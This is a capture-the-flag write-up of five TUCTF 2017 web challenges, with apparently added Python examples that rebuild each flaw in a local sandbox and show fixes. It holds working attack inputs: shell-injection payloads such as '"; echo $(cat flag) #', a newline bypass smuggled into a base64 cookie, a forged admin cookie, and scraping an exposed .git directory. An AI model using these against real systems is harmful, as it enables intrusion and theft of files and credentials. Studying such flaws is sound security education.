An Utsusemi of Keramas

Tales of security research, penetration testing, red teaming, and general hacking shenanigans.

27 November 2017

TUCTF 2017 | Web Challenges

by Keramas

Challenge:
High Source
Category:
Web



Loading the page and viewing its source, we get trolled: nothing useful there. But the page pulls in login.js, so what about the source of that script?



Oh hey, a hard-coded password sitting in client-side JavaScript! Logging in with it gives us the flag!
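The step above (enumerate the scripts a page loads, then grep them for credential-looking assignments) is worth automating. The following is an added example, not code from the writeup or the challenge; the HTML, the login.js body and the password in it are constructed stand-ins, and the fetch callback is assumed to return script text by src:

```python
import re
from html.parser import HTMLParser

# Constructed stand-ins for the challenge page and its script (not the real files).
INDEX_HTML = """<html><head><script src="login.js"></script></head>
<body><!-- nothing to see here --><form><input name="pw"></form></body></html>"""
SCRIPTS = {"login.js": 'function check(p) { var password = "s3cr3t_sample"; return p === password; }'}

# Assignments of a credential-like name to a quoted literal: password = "..." / token: '...'
SECRET_RE = re.compile(
    r'(?i)\b(pass(?:word|wd)?|pwd|secret|token|api[_-]?key)\b\s*[:=]\s*["\']([^"\']+)["\']'
)


class ScriptFinder(HTMLParser):
    """Collect the src of every <script> tag so each linked file can be pulled and scanned."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


def find_script_srcs(html):
    parser = ScriptFinder()
    parser.feed(html)
    return parser.srcs


def scan_for_secrets(text):
    """Return (name, value) pairs for every credential-looking literal in a script."""
    return [(m.group(1), m.group(2)) for m in SECRET_RE.finditer(text)]


def audit(html, fetch):
    """fetch(src) -> script text (assumed callback). Returns {src: hits} for scripts with hits."""
    hits = {}
    for src in find_script_srcs(html):
        found = scan_for_secrets(fetch(src))
        if found:
            hits[src] = found
    return hits


if __name__ == "__main__":
    print(audit(INDEX_HTML, SCRIPTS.__getitem__))
```

Against a live target, `fetch` would be a function that resolves the src against the page URL and downloads it; the regex is deliberately broad because challenge and real-world leaks alike tend to use obvious names.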






Challenge:
Cookie Duty
Category:
Web




The landing page hints heavily that this will involve cookies. We aren't admin, but the server hands us a "not_admin" cookie set to 1. If the server trusts that client-held value, changing it to 0 should make us admin.



Changing the cookie and replaying the GET request in Burp Suite, we trick the server into thinking we are admin and get our flag!
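To make the flaw concrete, here is an added example (not the challenge's code, whose server side is not shown in the writeup) that reconstructs the assumed check, builds the forged request the way it was sent from Burp, and puts the hardened form beside it: the role travels with an HMAC under a server-side key, so flipping the value no longer works. The flag, the key and the cookie format are constructed for the example:

```python
import hashlib
import hmac
import urllib.request

FLAG = "TUCTF{constructed_sample_flag}"          # constructed, not the real flag
SERVER_KEY = b"constructed-server-side-secret"    # assumed: lives only on the server


def parse_cookie_header(header):
    """'a=1; b=2' -> {'a': '1', 'b': '2'}; enough for the cookies in this challenge."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def vulnerable_page(cookie_header):
    """Assumed reconstruction of the challenge: whoever sends not_admin=0 is admin."""
    cookies = parse_cookie_header(cookie_header)
    if cookies.get("not_admin") == "0":
        return f"Welcome admin! {FLAG}"
    return "You are not admin."


def forged_request(url):
    """The request made with Burp in the writeup, built with urllib: same GET, cookie flipped."""
    req = urllib.request.Request(url)
    req.add_header("Cookie", "not_admin=0")
    return req


def issue_signed_cookie(role):
    """Hardened version: the role is accompanied by a MAC the client cannot recompute."""
    tag = hmac.new(SERVER_KEY, role.encode(), hashlib.sha256).hexdigest()
    return f"role={role}.{tag}"


def hardened_page(cookie_header):
    """Verify the MAC before trusting the role; a client-edited role fails the comparison."""
    cookies = parse_cookie_header(cookie_header)
    role, _, tag = cookies.get("role", "").rpartition(".")
    expected = hmac.new(SERVER_KEY, role.encode(), hashlib.sha256).hexdigest()
    if role and hmac.compare_digest(tag, expected) and role == "admin":
        return f"Welcome admin! {FLAG}"
    return "You are not admin."


if __name__ == "__main__":
    print(vulnerable_page("not_admin=1"))
    print(vulnerable_page("not_admin=0"))
    print(hardened_page(issue_signed_cookie("user").replace("role=user", "role=admin")))
```

A server-side session store (an opaque random ID mapped to the role on the server) is the other standard fix; the signed-cookie variant is shown because it keeps the challenge's shape of carrying the role in the cookie.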




Challenge:
Git Gud
Category:
Web



The challenge description says the site uses a version control system, and the title gives away that it is git. A quick search confirms the classic misconfiguration: the /.git directory is served by the web server, exposing the repository's refs, logs and objects, which is to say its entire history.



To make this easier, I downloaded the whole directory and walked it from the command line. The master branch's reflog (.git/logs/refs/heads/master) contains an update entry for adding a flag, and the hash on the left of that entry is the commit. Following that hash through the commit, its tree, and the blob the tree references (cat-file'ing each object) brings up the old file contents and gets us our flag!
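Walking a dumped .git by hand means understanding three object types: a commit points at a tree, a tree maps file names to blobs, and every object is a zlib-compressed "<type> <size>\0<body>" named by its SHA-1. The following added example (not the writeup's commands or the challenge's repository) writes a constructed two-commit history where flag.txt is added and then deleted, and then recovers the deleted file by following HEAD through the commit chain exactly as git cat-file would. The author identity, timestamp and flag value are made up for the sample:

```python
import hashlib
import os
import tempfile
import zlib


def write_object(git_dir, kind, body):
    """Store a loose object as git does: '<kind> <len>\\0<body>', SHA-1 named, zlib-compressed."""
    raw = b"%s %d\0" % (kind.encode(), len(body)) + body
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def read_object(git_dir, sha):
    """Inverse of write_object: decompress a loose object and split off its header."""
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    with open(path, "rb") as f:
        raw = zlib.decompress(f.read())
    header, body = raw.split(b"\0", 1)
    return header.split(b" ")[0].decode(), body


def parse_tree(body):
    """Yield (mode, name, hex sha) per entry; the sha is stored as 20 raw bytes after a NUL."""
    i = 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        yield mode, name, body[nul + 1:nul + 21].hex()
        i = nul + 21


def parse_commit(body):
    """Return (tree sha, parent sha or None, message) from a commit object."""
    headers, message = body.split(b"\n\n", 1)
    fields = dict(line.split(" ", 1) for line in headers.decode().splitlines())
    return fields["tree"], fields.get("parent"), message.decode().strip()


def walk_history(git_dir):
    """HEAD -> branch ref -> commit chain; collect every file version from every commit's tree."""
    with open(os.path.join(git_dir, "HEAD")) as f:
        ref = f.read().strip().split("ref: ", 1)[1]
    with open(os.path.join(git_dir, ref)) as f:
        sha = f.read().strip()
    seen = {}
    while sha:
        _kind, body = read_object(git_dir, sha)
        tree, parent, message = parse_commit(body)
        for _mode, name, blob_sha in parse_tree(read_object(git_dir, tree)[1]):
            content = read_object(git_dir, blob_sha)[1].decode()
            seen.setdefault(name, []).append((sha[:7], message, content))
        sha = parent          # None at the root commit ends the walk
    return seen


def build_sample_dump(git_dir):
    """Constructed sample .git: commit 1 adds flag.txt, commit 2 deletes it again."""
    ident = b"dev <dev@example.invalid> 1511740800 +0000"   # assumed author and timestamp

    def entry(name, sha):  # one tree entry: "<mode> <name>\0<20 raw sha bytes>"
        return b"100644 " + name.encode() + b"\0" + bytes.fromhex(sha)

    index = write_object(git_dir, "blob", b"<h1>nothing to see here</h1>\n")
    flag = write_object(git_dir, "blob", b"TUCTF{constructed_sample_flag}\n")  # not the real flag
    tree1 = write_object(git_dir, "tree", entry("flag.txt", flag) + entry("index.html", index))
    c1 = write_object(git_dir, "commit", b"tree %s\nauthor %s\ncommitter %s\n\nadded flag\n"
                      % (tree1.encode(), ident, ident))
    tree2 = write_object(git_dir, "tree", entry("index.html", index))
    c2 = write_object(git_dir, "commit", b"tree %s\nparent %s\nauthor %s\ncommitter %s\n\nremoved flag\n"
                      % (tree2.encode(), c1.encode(), ident, ident))
    os.makedirs(os.path.join(git_dir, "refs", "heads"), exist_ok=True)
    os.makedirs(os.path.join(git_dir, "logs", "refs", "heads"), exist_ok=True)
    with open(os.path.join(git_dir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/master\n")
    with open(os.path.join(git_dir, "refs", "heads", "master"), "w") as f:
        f.write(c2 + "\n")
    # The reflog is the "master" log read in the writeup: "<old> <new> <ident>\t<message>" per line.
    with open(os.path.join(git_dir, "logs", "refs", "heads", "master"), "w") as f:
        f.write("%s %s %s\tcommit (initial): added flag\n" % ("0" * 40, c1, ident.decode()))
        f.write("%s %s %s\tcommit: removed flag\n" % (c1, c2, ident.decode()))
    return git_dir


def recover_flag(git_dir=None):
    """Walk a dumped .git (the sample one if none is given) and return every flag.txt version."""
    if git_dir is None:
        git_dir = build_sample_dump(os.path.join(tempfile.mkdtemp(), ".git"))
    return walk_history(git_dir).get("flag.txt", [])


if __name__ == "__main__":
    for short_sha, message, content in recover_flag():
        print(short_sha, message, content.strip())
```

Pointing `recover_flag` at a real downloaded .git works as long as the objects are loose; a repository that has been packed keeps its history in .git/objects/pack, where `git cat-file` or `git log -p` is the easier tool.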






Challenge:
Cookie Harrelson
Category:
Web



More cookies! Inspecting the request and response headers on page load, we can see a cookie being passed.



This is base64-encoded, and decoding it we get:
cat index.txt

Neat... so what if we just base64-encode something like 'cat flag.txt' and swap it in? That is what I tried, but it wasn't that easy. When a different command is substituted, the cookie gets rewritten into something like this:

cat index.txt #(new command here)

So our input is being filtered: it is tacked onto the original command behind a #, which makes the shell treat it as a comment, and we need to bypass that. After a lot of trial and error, the trick is to get a carriage return/newline into the payload: a # comment only runs to the end of the line, so whatever follows the line break runs as a fresh command. Using Burp's decoder to base64-decode the original cookie, insert the line break and our command, and re-encode the result, we get our new cookie.



Now we can put the new cookie into Repeater and send our GET request, which gives us the flag!
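The following added example (not the challenge's server code, which the writeup does not show) reconstructs the observed behaviour as an assumption: any cookie command other than the expected one is appended behind "cat index.txt #" and handed to sh. It then runs the naive swap, a payload with only a bare carriage return, and the newline bypass against a constructed directory holding index.txt and flag.txt, so the shell's own comment handling decides what runs:

```python
import base64
import os
import subprocess
import tempfile

EXPECTED = "cat index.txt"


def make_sandbox():
    """Constructed stand-in for the challenge's web root: the index plus a flag to reach."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.txt"), "w") as f:
        f.write("welcome to the index\n")
    with open(os.path.join(root, "flag.txt"), "w") as f:
        f.write("TUCTF{constructed_sample_flag}\n")   # not the real flag
    return root


def server_command_from_cookie(cookie_b64):
    """Assumed filter, reconstructed from the rewritten cookie seen in the writeup:
    anything but the expected command is commented out behind the original one."""
    cmd = base64.b64decode(cookie_b64).decode()
    if cmd != EXPECTED:
        cmd = f"{EXPECTED} #{cmd}"
    return cmd


def run_as_server(cookie_b64, root):
    """What a naive handler does next: hand the string to sh -c inside the web root."""
    cmd = server_command_from_cookie(cookie_b64)
    return subprocess.run(["sh", "-c", cmd], cwd=root, capture_output=True, text=True).stdout


def encode_cookie(cmd):
    return base64.b64encode(cmd.encode()).decode()


def naive_attempt(root):
    """'cat index.txt #cat flag.txt': our command is inside the comment and never runs."""
    return run_as_server(encode_cookie("cat flag.txt"), root)


def carriage_return_only(root):
    """A bare \\r is an ordinary character to sh; the comment still swallows the command."""
    return run_as_server(encode_cookie("\rcat flag.txt"), root)


def newline_bypass(root):
    """'cat index.txt #\\ncat flag.txt': the comment ends at \\n, so line two executes."""
    return run_as_server(encode_cookie("\ncat flag.txt"), root)


if __name__ == "__main__":
    sandbox = make_sandbox()
    print(repr(naive_attempt(sandbox)))
    print(repr(newline_bypass(sandbox)))
```

If the exchange is replayed by hand, the newline has to survive both the base64 step and the HTTP layer; putting it inside the base64 payload, as the writeup does with Burp's decoder, keeps it out of the header's own line endings.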





Challenge:
iFrame and Shame
Category:
Web



This challenge took a bit of trial and error to solve. I started by probing the search box for input validation: a single " broke the page's formatting, which suggested the input is dropped unescaped into something on the server side and might be injectable.

After trying different things for a while, the following payload worked as a test (the leading " closes the quoted string our input sits in, the ; ends that command, and the trailing # comments out whatever the server appends):
"; echo $(ls) #



Based on this, we just change our command to give us our flag:
"; echo $(cat flag) #
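The writeup does not show what the search box runs on the server, so the following added example (not the challenge's code) assumes a handler that interpolates the query into a double-quoted shell string with grep as a stand-in for the search, and runs the writeup's payload against a constructed directory. The hardened form beside it passes the query as a single argv element with no shell at all, so quotes, semicolons and $(...) are just characters:

```python
import os
import subprocess
import tempfile


def make_webroot():
    """Constructed stand-in for the site's directory: a flag file plus something searchable."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "flag"), "w") as f:
        f.write("TUCTF{constructed_sample_flag}\n")   # not the real flag
    with open(os.path.join(root, "notes.txt"), "w") as f:
        f.write("nothing to search here\n")
    return root


def vulnerable_search(query, root):
    """Assumed shape of the handler: the term is dropped into a double-quoted shell string.
    A '"' in the input closes that string early, ';' starts a new command, '#' hides the rest."""
    cmd = f'grep -rl "{query}" .'
    return subprocess.run(["sh", "-c", cmd], cwd=root, capture_output=True, text=True).stdout


def hardened_search(query, root):
    """Same search with no shell: argv is built as a list and grep sees one literal pattern."""
    return subprocess.run(["grep", "-rl", "--", query, "."],
                          cwd=root, capture_output=True, text=True).stdout


PROBE = '"; echo $(ls) #'          # the writeup's test payload
EXFIL = '"; echo $(cat flag) #'    # the writeup's flag payload


if __name__ == "__main__":
    webroot = make_webroot()
    print(repr(vulnerable_search(PROBE, webroot)))
    print(repr(vulnerable_search(EXFIL, webroot)))
    print(repr(hardened_search(EXFIL, webroot)))
```

The single " that "broke the format" during probing is exactly the character that closes the interpolated string; whenever a stray quote changes a page's shape, it is worth assuming the input reaches a shell, a query or a template unescaped.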



tags: CTF challenge